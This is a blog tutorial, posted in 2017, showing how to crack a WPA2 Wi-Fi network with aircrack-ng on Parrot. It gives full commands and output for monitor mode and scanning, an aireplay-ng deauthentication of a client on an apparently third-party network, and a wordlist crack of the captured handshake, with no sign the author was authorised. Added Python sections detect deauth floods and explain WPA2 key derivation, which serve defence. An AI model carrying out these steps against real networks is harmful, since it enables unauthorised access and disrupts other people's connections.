Cracking a WPA2 network with aircrack-ng and Parrot.

Posted: August 23, 2017. At: 2:36 PM. Post ID: 11250

Starting a USB wireless interface in monitor mode.

┌─[root@parrot][/home/jason]
└──╼ #airmon-ng start wlan1
 
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
 
  PID Name
  593 NetworkManager
  749 wpa_supplicant
  923 dhclient
 
PHY	Interface	Driver		Chipset
 
phy0	wlan0		ath9k		Qualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
phy1	wlan1		rt73usb		Belkin Components F5D7050 Wireless G Adapter v3000 [Ralink RT2571W]
 
		(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
		(mac80211 station mode vif disabled for [phy1]wlan1)

Now we need to list all wireless networks to find the one we wish to attack.

┌─[root@parrot][/home/jason/Documents]
└──╼ #airodump-ng wlan1mon

I got this output.

 CH 11 ][ Elapsed: 54 s ][ 2017-08-24 08:13                                         
 
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 00:25:00:FF:94:73   -1        0        0    0  -1  -1                    <length:  0>                                                          
 E0:B9:E5:B8:31:BB  -39       30        0    0  11  54e  WPA2 CCMP   PSK  OPTUSVD3AEDEA                                                         
 E0:B9:E5:6E:D3:69  -77       29        0    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                         
 F4:6B:EF:B8:E9:27  -78       17        0    0  11  54e  WPA2 CCMP   PSK  OPTUS_B8E926                                                          
 FA:AB:05:CF:98:E2  -85        2        0    0   6  54e  OPN              Telstra Air                                                           
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                       
 
 00:25:00:FF:94:73  82:FC:02:C5:6D:52  -79    0 -12      0       10                                                                              
 F4:6B:EF:B8:E9:27  A0:2C:36:E3:CD:C1  -81    0 - 1      0        8                                                                              
 F4:6B:EF:B8:E9:27  F0:C7:7F:78:19:D5  -83    0 - 1      0        1

Select the BSSID (MAC address) of the target access point; we are then ready to begin attacking that access point.

 CH  6 ][ Elapsed: 5 mins ][ 2017-08-24 08:20 ][ WPA handshake: E0:B9:E5:6E:D3:69                                         
 
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 
 E0:B9:E5:6E:D3:69  -77 100     2540      137    0   6  54e  WPA2 CCMP   PSK  Telstra6ED369                                                     
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                      
 
 E0:B9:E5:6E:D3:69  68:64:4B:2A:10:18  -83    2e- 1      0     1600

There is a client associated with the wireless network, so we can help the attack along by kicking that client off.

Send deauthentication frames from a separate terminal window to the client; it disconnects, reconnects, and the WPA handshake can be captured as it re-associates.

┌─[root@parrot][/home/jason]
└──╼ #aireplay-ng -0 6 -a E0:B9:E5:6E:D3:69 -c 68:64:4B:2A:10:18 wlan1mon
08:19:14  Waiting for beacon frame (BSSID: E0:B9:E5:6E:D3:69) on channel 6
08:19:14  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [42|34 ACKs]
08:19:15  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [31|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [29|35 ACKs]
08:19:16  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|39 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [25|38 ACKs]
08:19:17  Sending 64 directed DeAuth. STMAC: [68:64:4B:2A:10:18] [22|23 ACKs]

The attack in this case was a success. I managed to capture a wireless network handshake by sending deauth packets to the client.
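The defender's side of that deauth step, as an added example that is not part of the original post: a small parser for raw 802.11 management frames that flags a burst of deauthentication/disassociation frames aimed at one client, which is exactly the pattern the aireplay-ng output above produces. The sample frames are constructed inline (not real traffic) using the BSSID and station address from the capture; in practice the frames would come from a monitor-mode capture or a WIDS sensor.

```python
import struct
from collections import defaultdict, deque

DEAUTH, DISASSOC, BEACON = 0x0C, 0x0A, 0x08   # 802.11 management-frame subtypes

def parse_mgmt(frame):
    """Parse a raw 802.11 management frame -> (subtype, addr1, addr2, addr3, reason) or None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:   # frame type 0 = management
        return None
    subtype = frame[0] >> 4
    mac = lambda b: ':'.join(f'{x:02X}' for x in b)
    reason = None
    if subtype in (DEAUTH, DISASSOC) and len(frame) >= 26:
        reason = struct.unpack('<H', frame[24:26])[0]     # little-endian reason code
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

def detect_deauth_flood(frames, window=1.0, threshold=10):
    """frames: iterable of (timestamp_s, raw_bytes). A single deauth is normal; a burst of
    deauth/disassoc frames from one BSSID to one client inside `window` seconds is flagged once."""
    recent, alerts, alerted = defaultdict(deque), [], set()
    for ts, raw in frames:
        p = parse_mgmt(raw)
        if p is None or p[0] not in (DEAUTH, DISASSOC):
            continue
        _, da, _sa, bssid, reason = p
        key = (bssid, da)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:          # drop frames that fell out of the sliding window
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({'bssid': bssid, 'sta': da, 'count': len(q), 'reason': reason, 'at': ts})
    return alerts

# --- constructed sample capture (not real traffic): 5 beacons, then a 64-frame deauth burst ---
def mgmt_frame(subtype, da, sa, bssid, body=b''):
    mac = lambda s: bytes.fromhex(s.replace(':', ''))
    return bytes([subtype << 4, 0]) + b'\x00\x00' + mac(da) + mac(sa) + mac(bssid) + b'\x00\x00' + body

AP, STA = 'E0:B9:E5:6E:D3:69', '68:64:4B:2A:10:18'      # addresses taken from the capture above
SAMPLE = [(0.1 * i, mgmt_frame(BEACON, 'FF:FF:FF:FF:FF:FF', AP, AP)) for i in range(5)]
SAMPLE += [(1.0 + 0.002 * i, mgmt_frame(DEAUTH, STA, AP, AP, struct.pack('<H', 7))) for i in range(64)]

if __name__ == '__main__':
    for a in detect_deauth_flood(SAMPLE):
        print(f"deauth flood: {a['count']} frames from {a['bssid']} to {a['sta']} in 1 s (reason {a['reason']})")
```

Detection is the fallback; the mitigation is 802.11w (Protected Management Frames), which lets a client discard forged deauth/disassoc frames that carry no valid MIC.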

Now I am trying to crack the wireless Pre-Shared Key with a wordlist.

┌─[root@parrot][/home/jason]
└──╼ #aircrack-ng password-01.cap -w rockyou.txt

This is what the cracking run looks like, but the passphrase has to be in the wordlist for aircrack-ng to recover it.

                                 Aircrack-ng 1.2 rc4
 
      [00:00:27] 45676/9822768 keys tested (1715.21 k/s) 
 
      Time left: 1 hour, 35 minutes, 0 seconds                   0.47%
 
                       Current passphrase: lovinhim1                  
 
 
      Master Key     : 0F EE 18 DC 93 8B 08 17 41 A8 12 31 DD 43 77 37 
                       A3 C1 87 09 9E A2 CC 80 56 F8 EF 91 B5 0E 51 04 
 
      Transient Key  : A5 32 F4 A1 C6 66 29 42 BB E8 D3 98 9E A3 09 80 
                       65 31 31 05 19 DF A8 23 5D 07 B4 93 89 27 2B 0A 
                       F2 4A 74 BA 89 D8 AA 0D EF 00 9F FE 72 B3 FB CA 
                       B2 3A 31 D3 95 36 54 BC A5 FC 16 E9 4B A0 29 41 
 
      EAPOL HMAC     : 4D 0F 42 12 7C 68 3D 12 F3 A0 67 98 F3 33 19 39

This attack works once a client is successfully kicked off the network: the client reconnects, and the WPA handshake is captured to the file automatically. It is a great way to crack a wireless network; the only hard part is cracking the Pre-Shared Key, which requires a massive wordlist to run against the captured handshake. Once you have a suitable collection of rainbow tables and wordlists, the Pre-Shared Key can be cracked.
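To make the cost argument above concrete, here is an added Python example (not part of the original post) that derives the WPA2 Pairwise Master Key the way the 'Master Key' line in the aircrack-ng output reports it, shows why precomputed tables have to be built per SSID, and reproduces the post's 'Time left' arithmetic. The SSIDs are the ones seen in the scan above; the candidate passphrases are constructed.

```python
import hashlib
import time

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key per IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase, salted
    with the SSID, 4096 iterations, 256-bit output. This is the value aircrack-ng prints as Master Key."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError('WPA-PSK passphrases are 8 to 63 ASCII characters')
    return hashlib.pbkdf2_hmac('sha1', passphrase.encode(), ssid.encode(), 4096, dklen=32)

def pmk_is_ssid_specific(passphrase: str, ssids) -> bool:
    """True when one passphrase yields a different PMK for every SSID, which is why a
    precomputed (rainbow) table only helps against networks using the SSID it was built for."""
    return len({wpa2_pmk(passphrase, s) for s in ssids}) == len(ssids)

def pbkdf2_rate(samples: int = 50) -> float:
    """Single-core PMK derivations per second in Python; every wordlist candidate costs one."""
    t0 = time.perf_counter()
    for i in range(samples):
        wpa2_pmk(f'candidate{i:04d}', 'Telstra6ED369')   # constructed candidates, SSID from the scan
    return samples / (time.perf_counter() - t0)

def seconds_to_exhaust(remaining_keys: int, keys_per_second: float) -> float:
    """Worst-case time for a wordlist run at a given rate (the figure aircrack-ng shows as Time left)."""
    return remaining_keys / keys_per_second

if __name__ == '__main__':
    # IEEE 802.11i test vector: passphrase 'password', SSID 'IEEE'
    print(wpa2_pmk('password', 'IEEE').hex())
    print('distinct PMK per SSID:', pmk_is_ssid_specific('password', ['IEEE', 'Telstra6ED369', 'OPTUS_B8E926']))
    print(f'python PBKDF2 rate: {pbkdf2_rate():.0f} keys/s')
    # the post's run: 9822768 - 45676 keys left at 1715.21 k/s -> about 1 h 35 min
    print(f'post wordlist exhausts in {seconds_to_exhaust(9822768 - 45676, 1715.21) / 60:.1f} min')
```

The 4096-iteration derivation is what caps the post's rate at roughly 1715 keys per second, so a passphrase that is long and not in any wordlist is the effective defence, not the SSID or the cipher.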
